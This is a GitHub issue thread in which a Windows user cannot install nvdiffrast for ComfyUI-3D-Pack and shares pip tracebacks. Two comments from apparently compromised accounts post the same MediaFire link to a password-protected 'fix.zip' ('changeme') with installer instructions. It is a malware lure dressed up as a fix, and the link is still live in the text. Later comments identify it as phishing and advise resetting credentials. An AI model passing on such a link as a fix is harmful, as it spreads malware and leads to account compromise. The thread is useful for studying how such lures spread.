### ISSUE TITLE
找不到 nvdiffrast

### ISSUE THREAD

**Issue by Superming997** [jtydhr88/ComfyUI-Unique3D#29]
使用ComfyUI，下 ComfyUI-3D-Pack，使用install_windows_portable_win_py311_cu121.bat 安装完毕后，运行Comfy UI报错

  File "E:\AI_ComfyUI\ComfyUI\custom_nodes\ComfyUI-3D-Pack\nodes.py", line 48, in <module>
    from FlexiCubes.flexicubes_trainer import FlexiCubesTrainer
  File "E:\AI_ComfyUI\ComfyUI\custom_nodes\ComfyUI-3D-Pack\MVs_Algorithms\FlexiCubes\flexicubes_trainer.py", line 10, in <module>
    from .flexicubes_renderer import FlexiCubesRenderer
  File "E:\AI_ComfyUI\ComfyUI\custom_nodes\ComfyUI-3D-Pack\MVs_Algorithms\FlexiCubes\flexicubes_renderer.py", line 5, in <module>
    import nvdiffrast.torch as dr
ModuleNotFoundError: No module named 'nvdiffrast'

提示找不到nvdiffrast，

下载了nvdiffrast 的zip 文件

使用 E:\AI_ComfyUI\python_embeded\python.exe -m pip install . 安装 

报错 
Processing d:\webdownload\nvdiffrast-main\nvdiffrast
  Preparing metadata (setup.py) ... error
  error: subprocess-exited-with-error

  × python setup.py egg_info did not run successfully.
  │ exit code: 1
  ╰─> [6 lines of output]
      Traceback (most recent call last):
        File "<string>", line 2, in <module>
        File "<pip-setuptools-caller>", line 34, in <module>
        File "D:\WebDownload\nvdiffrast-main\nvdiffrast\setup.py", line 9, in <module>
          import nvdiffrast
      ModuleNotFoundError: No module named 'nvdiffrast'
      [end of output]

  note: This error originates from a subprocess, and is likely not a problem with pip.
error: metadata-generation-failed

× Encountered error while generating package metadata.
╰─> See above for output.

note: This is an issue with the package mentioned above, not pip.
hint: See above for details.

请问这个 nvdiffrast 如何安装呢，Windows 11 系统 cuda 都已安装，ComfyUI其它节点运行正常

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Superming997** [comment]
Thanks，虽然不能使用，双击就自动关闭了，

把这个库拷贝到Side package 目录下就可以编译了
E:\AI_ComfyUI\python_embeded\Lib\site-packages\nvdiffrast>E:\AI_ComfyUI\python_embeded\python.exe -m pip install .

**Comment by Lunatik00** [comment]
So, this is where your account got compromised, if an admin reads this, the comment with the link is a phishing attempt, it is posted automatically by a compromised account, I know it is obvious, but apparently not obvious enough, if you can, delete that comment, if you can't, at least warn people about it.

**Comment by Lunatik00** [comment]
@Superming997 Delete your ssh keys from github and reset your password
